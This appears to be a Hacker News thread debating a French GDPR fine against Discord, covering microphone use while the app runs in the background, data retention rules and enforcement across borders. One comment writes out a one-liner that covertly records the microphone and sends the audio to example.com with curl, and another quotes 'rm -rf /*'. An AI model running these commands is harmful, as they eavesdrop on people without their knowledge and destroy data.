Microsoft has applications which follow the same pattern. For example the Anti-Virus runs in the background and indicates it status via notification/tray icon. Opening or closing the settings window has no effect on its operation.

I don’t think the background worker is the problem. It’s the fact that the user remains in a call, with their microphone hot, potentially against their expectation

"X" hasn't meant end the process for over 20 years.

In 2022, it could very well be the better choice for most users to not end a voice call just because they clicked the "X" to get rid of the window. Just like what Skype, other Voip services, and most chat services have done forever.

This ruling is a bit disappointing.

That's most of my life and I've always associated X with end process. Maybe I'm the odd one out.

The classic use case is minimize to tray vs minimize to taskbar. Winamp even had these two different modes in like 1999.

Winamp is:

1. Making it obvious that it's still active (hard to miss that a music player is... playing music)

2. Not listening to your microphone

I'm even less a fan of discord having awful options there.

Because this is beyond UX and password policy, it's about behaviour that is bad

>Also, regulatory agencies mandating UI designs - while in this case fairly innocuous - leaves a bad taste in my mouth.

There are probably a bunch of regulations that dictate on what is in your car's cabin and how they work.

Cars are tons of metal moving at very high speeds under manual control, so I can understand why that would need greater regulatory scrutiny.

Their only product is a software whose background process scanner can never be disabled.

That's a red flag to me already.

So if I’m an American company and have no offices in Europe and ignore GDPR for my free customers, what happens? Will I get arrested by the Polizei when I land in Berlin? Will the US force me to pay these fines?

Basically, if you do business in the EU (have customers there) then you'll be held accountable.

Or if you have non-paying users. Commerce is not a requirement for being subject to the GDPR.

My suspicion is that only companies with significant business interests in the EU are targeted, investigated and fined. Otherwise they could just ignore it.

You sure? Lots of small fish are caught in this net.


Yes, the European Commission will collaborate with international governments to impose fines.

No, they will not. If you're a company with a substantial enough userbase in their country to be investigated under their regulations, then failing to follow them and/or ignoring fines will most likely result in them preventing your services from being accessed in their country.

Which international governments? Why would the US agree to impose an EU fine, and under what legal basis?

Why would European countries extradite american criminals to the US? Because we established a trust in each other and want to keep it that way for both sides benefits.

this is a poor comparison. Extradition treaties exist and contain specific legal obligations. It is not based on trust and there are several pairs of countries that do not have specific extradition treaties.

> treaties [...] not based on trust

How are these treaties enforced? All international treaties are ultimately based on trust. There is no higher authority, only elective councils of and voluntary commitment to procedures (a.k.a. promises) by sovereign states.

Specifically not even these formal promises have been given by e.g. the United States of America which to this day has signed but never ratified either the VCLT[1] or the VCLTIO[2], so is figuratively giving a lukewarm "let's see about the convenience of that when it comes up".

1: https://en.wikipedia.org/wiki/Vienna_Convention_on_the_Law_o...

2: https://en.wikipedia.org/wiki/Vienna_Convention_on_the_Law_o...

I think, de facto, nothing will happen. But if you start to evade taxes on your foreigner paying costumers, and you avoid local regulations, then you expose yourself to a risk.

Probably nothing happens. I doubt they're going to spend time investigating a company that doesn't do any business in Europe, when there's a very long list of bigger companies that do operate here and break our privacy and sell our data.

If the company doesn't do any business in Europe it has no users in Europe, therefore it doesn't have to comply with the GDRP at all.

GDPR is extra-territorial and its rights apply to EU citizens wherever they are in the world

if a EU user is in the US ON HOLIDAY! and they're using your service, you're subject to the GDPR

(in theory)

No. GDPR isn't tied to citizenship. EU citizens & residents are not covered by GDPR when they are outside of EU unless member state's law applies by virtue of public international law (https://gdpr-info.eu/art-3-gdpr/).

A bit more unclear situation is if non-resident is visiting EU and uses services from their home country.

like most EU law it's badly written, but it states "to such data subjects in the Union"

given "within the Union" is used separately in the next sub-article to mean physically located within, it's arguable that "in the Union" could mean citizen of

Seizing income originating from Europe, seizing payments to European companies seems obvious steps.

> Will I get arrested by the Polizei when I land in Berlin?

Maybe also this.

> Will the US force me to pay these fines?

I am also curious.

My question as well. Can a non-EU company simply refuse to pay, and also refuse to block users from the EU? I wonder if the EU would decide to block access to the foreign service as a result. It would at least force them to be honest about the fact that they're effectively turning the internet into a legal-regional network rather than a global one.

> It would at least force them to be honest about the fact that they're effectively turning the internet into a legal-regional network rather than a global one.

This happened a long time ago. And it was started by the US, I'm quite sure.

More than that, the American way to manage the "global network" is basically to impose US laws everywhere in the world.

You can receive DMCA notices outside the US, for example.

Or even crazier: https://en.wikipedia.org/wiki/United_States_v._Elcom_Ltd.

Someone arrested, in the US, for a "crime" in another country, that wasn't even a crime in his country.

> The case raised some concerns of civil rights and legal process in the United States, and ended in the charges against Sklyarov dropped and Elcomsoft ruled not guilty under the applicable jurisdiction.

So it's an example of "law enforcement can and sometimes do illegally attest / cause other issues unfairly", but not really a good example of a law being imposed outside the country which made that law.

That's just an egregious example, but there were also literal international trade treaties where the US basically imposed adoption of the DMCA as a condition.

Also the fact that many major tech companies are American means that US laws are basically enforced on all of their users, which is super crazy.

Including stuff like...


> The CLOUD Act primarily amends the Stored Communications Act (SCA) of 1986 to allow federal law enforcement to compel U.S.-based technology companies via warrant or subpoena to provide requested data stored on servers regardless of whether the data are stored in the U.S. or on foreign soil.

This includes foreign based subsidiaries!

So if the US Gov decides that Facebook needs to give something over, everything and everyone owned by Facebook, everywhere around the world, needs to comply. So Facebook Zambia needs to hand over the data to Facebook US. On paper there are some protections, but I'd really, really want to see how well they're enforced (I doubt it).

It's so bad cloud providers have pages about it:


Where they basically say: "yeah, it's true, we'll fight in a court of law on your behalf, because otherwise a huge chunk of you in other countries would never use us".

> the company has complied with this obligation under the GDPR during the procedure, as it now has a written data retention policy, which includes deleting accounts after two years of user inactivity

I find this interpretation of the GDPR surprising. Reviewing article 5.1.e there isn't any mention of timelines or any other definition of "necessary".

As a user, I wouldn't want my account blown away just because I haven't logged in for a while.

If this was e.g., an advertiser I don't have a direct relationship with, then yeah, purge that data! But data retention is a core of my relationship with Discord, so I want that data kept around.

"..because I haven't logged in for a while".

That is a misrepresentation of the ruling.

2.4 million accounts not used in the last 3 years. This isn't "a while" it is a reasonable amount of time for a company to assume that someone doesn't want you to keep their data any longer unless they still have some other relationship with you or have your consent to keep the data stored until you explicitly delete it.

The regulations are to strike a balance between the needs of the business and the needs of the individual where the individual's privacy should generally win over the desires of the business.

I don't feel it's misrepresentative because I've gone 2-3 year spans without logging into plenty of services, and I expected my data to be there when I returned.

I've had companies email me saying "log in or we'll delete your inactive account". That's a compromise I can accept.

This article doesn't specify whether Discord does this. I'm also curious whether that practice is required under the GDPR, which the article doesn't specify either.

Would GDPR still apply if discord stored all personal data on other p2p clients?

Yes. GDPR is not focused on storage only, but on data handling as a whole. No matter where the data is stored, it's still collected and handled by Discord, thus they are responsible for what they do with it.


With all due respect 800.000 is a moderate amount looking at some awards in the consumer space in the US considering that we are looking here at a situation where eavesdropping on other people in the privacy of their homes is involved.

They could simply warn the company if they thought that would really be a problem. Fining 800k is ridiculous. If they can do this, they can attack anyone with a similar reasoning, which effectively turns GDPR into a weapon.

Yeah, 800k might not be much, but the ideology is the problem here, not the amount.

The amount of the fine is explained in the bulletin you are commenting upon:

"The amount of the fine was decided regarding the breaches identified, the number of people concerned, but also taking into account the efforts made by the company throughout the procedure to reach compliance and the fact that its business model is not based on the exploitation of personal data."

So evidently there was a dialog with the company during which they remedied much of the fault. Isn't that exactly the sort of approach you'd want from a regulator?

> It's just a "weapon" by the EU to attack any company they want. I'm pretty much sure if I made a hello world program in C, they'd find a clever way of fining me.

Not so. Your hello world in C be just fine. Only if you track data of users that happen to live in the EU. Don't track and you absolutely will not violate GDPR.

Discord broke the law in France and gets fined according the the laws in France.

The flagged issues could have been easily avoided by having a proper GDPR trained lawyer review the service and suggest changes.

I think GDPR being a weapon to attack companies is a good thing.

I've always thought that the bad aspect of GDPR is that it's General. We have in Slovenia a strict law about privacy and personal data protection. Companies with Slovene customers had to implement country specific notices and contracts, but GDPR made that easier. Especially for companies.

That's how I viewed it; as a legislation that allows companies to harvest user data easily and that's the main point why I was against it.

This comment sort of opened my mind a bit, now the same central legislation can also be used for the benefit of the people, since a legislation enforcement agency does not have to know so much regulation to defend user data. Though on the other hand, the GDPR is pretty long, much longer than slovenian law (we didn't implement GDPR yet, SI is currently paying fees for not implementing it).

Note: Big AFAIK -- law is really not something I understand, please correct me or add your opinion.

Can you explain a bit more? What's the problem here?

EU being able to attack any developer by making up a GDPR excuse and fine them as they want is the problem here.

How are they even making things up here? If you read through the entire thing they have a very valid case against Discord, ranging from the UX being confusing (i.e. "data protection by default") to actually storing the data they are not allowed to (i.e. illegally).

If you operate in a jurisdiction you operate by that jurisdictions laws. Do you think European companies don't have to abide by US laws when operating in the US?

That would be a problem. However, that is not what happened.

Discord (the company) was fined for multiple breaches of the GDPR regulation.

This is the reason why GDPR is something good.

Developers are not above the law. Companies are definitely not above the law, considering that the law is an impediment to their functioning and not something they will fight for.

The reign of super-large companies is a threat to democracy, because a democracy is made for its citizens; a company is a tool and should remain under control of society. Why can companies decide how much taxes they pay ? Why can they decide where they pay them ? How can they be so powerful as to decide that breaking society's will is merely a fine, and is taken into account in the budget ? This is ridiculous. The companies are not citizens, they do not need to be cajoled.

>if I made a hello world program in C, they'd find a clever way of fining me

Last time I check Hello World do not contain any internet connection code, let me know an example of C hello world that grabs your microphone input then sends it over the internet. Probably would be a single Linux command line job.

Something like:

    nohup arecord /tmp/audio & ; nohup while :; do curl -F'data=/tmp/audio' http://example.com; done & 
Untested pseudocode, but probably close - that's enough for a GDPR violation I guess? That it'd record unimpeded while running in the background, and sending the output elsewhere?

Pretty stupid scenario - sad Discord had locations in that area, because I agree with a lot of other posters, it seems to just be a weaponized law for monetary gain.

> that's enough for a GDPR violation I guess?

No, you would also need to run on computers of people not understanding what is going on.

In the same way as running

> rm -rf /*

on computers of people not understanding what is going on (or not agreeing to it) and where you are not allowed to do so is illegal, for quite good reasons.

Did the users choose to install the Discord app (or run a random command?)

How are you supposed to confirm "user understanding"?

Does the program need to require a tutorial/training before it's being used?

A user's ignorance shouldn't be a software distributor's problem.

If the discord app didn't have a system tray, and hid it's process from the Process List someway, maybe you have a point - this is just ignorance across the board.

I think if you are doing the close is actually not killing the app you should ensure the user is aware the app is still recording. Some apps will show a recoding thinggy ont he screen or it will tell you before closing and you need to agree.

I don't have the time to test this, but if is true that you close the app and it sill continue recording that this is bad UX and the company should have prioritize fixing this instead of adding even more crap. Maybe some good practices would come from this.

Doesn't it show a system tray icon? (I don't use discord on Windows, or a system tray myself) - is a system tray icon not adequate? I believe it would show 24/7 wouldn't it?

I am not sure, it won't be enough IMO if the icon in the Tray is not changing to a clear Recording icon.

It would be like on my phone the big red End Call button would not end the call, just minimize the app and put a small gray icon on the top-bar section.

The system tray icon turns into a generic circle that nobody would associate with Discord unless they tried clicking it.

Windows has also been hiding all system tray icons for over 2 decades at this point, unless the user specifically unhides that application.

> A user's ignorance shouldn't be a software distributor's problem.

Deliberately causing user's ignorance should be a software distributor's problem.

I'm an EU citizen and support the GDPR. But it's only a question of time before the US will interpet these fines as an undeclared trade war and make up the legal framework to do retaliatory strikes against EU tech companies.

Borders and tariffs will be the long-term future of the Internet.

Given that EU companies are also getting fines, not only foreign ones, this interpretation would be silly.

The real trade war is all of the Cloud act chicanery https://news.ycombinator.com/item?id=33562182

I should clarify that anyone under fire regarding Schrems II either needs to convince an EU member state's court that the Cloud Act is unlikely to result in GDPR data protection issues, or that the US has no way of obtaining that information in the first place (eg. no US corporation or persons have access to EU citizen data).

Well, the US has already a lot of restrictions to companies that want to do business in dollars and not just on Internet companies.

See https://www.justice.gov/opa/pr/bnp-paribas-agrees-plead-guil...

This is a case of trade with countries under embargo.

One of the main use of internet surveillance was trade (e.g. Boeing vs. Airbus deals).

I believe the US department of justice have the right structure to make this kind of fines, part of the fines goes to found the department of justice.

The GRPR is fully within the remits of existing trade agreements and does not violate US constitutional law, so as long as the EU is not selectively targeting US companies(and there is no evidence of that being the case), it's going to take a lot of crazy politicians and some tearing up of bilateral trade and cooperation agreements for the American authorities to take any action other then assisting the EU in collecting fines from American companies.

There nothing new about companies enforcing their existing laws on imported goods and services and the eu-us free trade agreement's already contains clauses where both parties have to assist each other if a company is trying to evade those rules. The only thing new is that the regulators are now considering digital services to cross the border when there is money flowing the other way.

If the US were going to raise a stink they would have done so when the EU kept doubling MS antitrust fine until MS eventually paid up, issuing GDPR fines to discord that is smaller then what smaller European companies have been fined ain't going to be an issue for the trans Atlantic trade relationships. Especially as GDPR style rules are being proposed at the state level in the US.

Region locking of copyrighted material is where the real blocks in content is going to come into play(as it already have) but that is a whole different can of mud.

I guess their assumption is that US wouldn't have that many options whom to retaliate to. Who would they fine? Spotify, maybe? Who else?

If regulating foreign companies is an undeclared trade war, could the US government please give Volkswagen its billions of dollars back?

Eh, maybe, but also maybe not.

Five states have passed their own privacy laws, with one in effect now and others coming online soon.

If this practice continues, and it likely will, it will soon becoming completely unmanageable for US tech companies to keep up with the myriad of state privacy laws.

At that point the federal government will likely pass a federal privacy law, which supersedes all the state privacy laws. And once we have a federal privacy law, it will likely be designed to at least be somewhat compatible with GDPR.

So, I don’t see the US going to war over this issue. I think the political winds are drifting in the other direction, and the US will follow Europe on this. Eventually.

Good. More borders and tariffs (AND TAXATION, let me add) are definitely needed. Internet should contribute to a greater good, not enable transnational companies, tax evasion and data thief.

If the US choses to interpret the GDPR that way, despite the fact that some significant receivers of fines are European itself (like H&M, Vodafone, two Italian energy and telecoms, Marriott and British Airways) then that would just show that American tech is an extended arm of the American government and in that case we should prioritize our sovereignty in the EU.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact